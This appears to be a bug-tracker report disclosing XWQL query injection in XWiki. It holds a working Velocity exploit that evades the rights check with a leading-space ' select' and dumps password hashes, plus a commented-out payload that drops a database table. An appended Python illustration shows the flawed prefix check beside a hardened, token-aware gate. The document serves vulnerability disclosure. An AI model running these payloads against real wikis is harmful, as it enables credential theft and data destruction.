Details
- Bug
- Resolution: Cannot Reproduce
- Major
- None
- 2.4 M1
- Unknown
Description
Here are 2 exploits for making XWQL select arbitrary data (and alter data on some databases).
The first is embarrassingly simple to carry out. Apparently there is a programming right check if the query text starts with "select", but it doesn't check if the first parser token is a select token, resulting in the obvious " select" attack.
I think this query language is somewhat safer than HQL but only for the reason that the holes don't always line up between XWQL and HQL.
{{velocity}}
#if($xcontext.hasProgrammingRights())
You have PR, attacking is pointless
#end
#set($xqm = $xwiki.getQueryManager())
{{{
Queries starting with 'select' are banned but not starting with ' select'
Password hashes:
#foreach($user in $xqm.xwql(" select p, u from Document as doc, doc.object(XWiki.XWikiUsers) as u, StringProperty as p where p.id = u.id and p.name = 'password'").execute())
#foreach($el in $user)
$el
#end
#end
## Oh you again.
## this blows up with an error but the work gets done. (Only drop tables on Postgres or MSSQL, read anything in other DBs except HSQL)
##$xqm.xwql("where ''='\' or '; drop table xwikicomments; commit; --\' = doc.fullName").execute()
}}}
{{/velocity}}
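The prefix-versus-token mismatch the report describes, as an added illustration in Python that is not part of the report or of XWiki's own code: a naive `startswith("select")` gate beside a gate that classifies on the first parser token, plus an audit helper that lists which constructed statements slip past the naive gate. The function names, the token regex and the sample statements are assumptions.

```python
import re

# Constructed illustration of the flaw the report describes: a programming-
# rights gate that tests the raw string prefix, beside a check that decides on
# the first parser token. Hypothetical code, not XWiki's QueryManager.
RESTRICTED_LEADING_KEYWORDS = frozenset({"select"})

_FIRST_TOKEN = re.compile(r"\s*([A-Za-z_][A-Za-z0-9_]*)")


def naive_needs_programming_rights(statement: str) -> bool:
    """Flawed gate: raw prefix test, so ' select' or 'SELECT' count as short-form."""
    return statement.startswith("select")


def first_token(statement: str):
    """First keyword as a parser sees it: leading whitespace skipped, case folded."""
    m = _FIRST_TOKEN.match(statement)
    return m.group(1).lower() if m else None


def tokenized_needs_programming_rights(statement: str) -> bool:
    """Hardened gate: classify on the first token, not on the raw characters."""
    return first_token(statement) in RESTRICTED_LEADING_KEYWORDS


def may_execute(statement: str, has_programming_rights: bool,
                check=tokenized_needs_programming_rights) -> bool:
    """True if the caller may run the statement under the given gate."""
    return has_programming_rights or not check(statement)


def audit_bypasses(statements):
    """Statements the token-aware gate restricts but the prefix gate lets through."""
    return [s for s in statements
            if tokenized_needs_programming_rights(s)
            and not naive_needs_programming_rights(s)]


# Constructed sample statements (no real data). The leading-space form is the
# one the report shows; the tab/uppercase form is the same mismatch.
SAMPLE_STATEMENTS = [
    "select doc.fullName from Document as doc",
    " select doc.fullName from Document as doc",
    "\tSELECT doc.fullName from Document as doc",
    "where doc.space = 'Main'",
]

if __name__ == "__main__":
    for s in audit_bypasses(SAMPLE_STATEMENTS):
        print("prefix gate bypassed by:", repr(s))
```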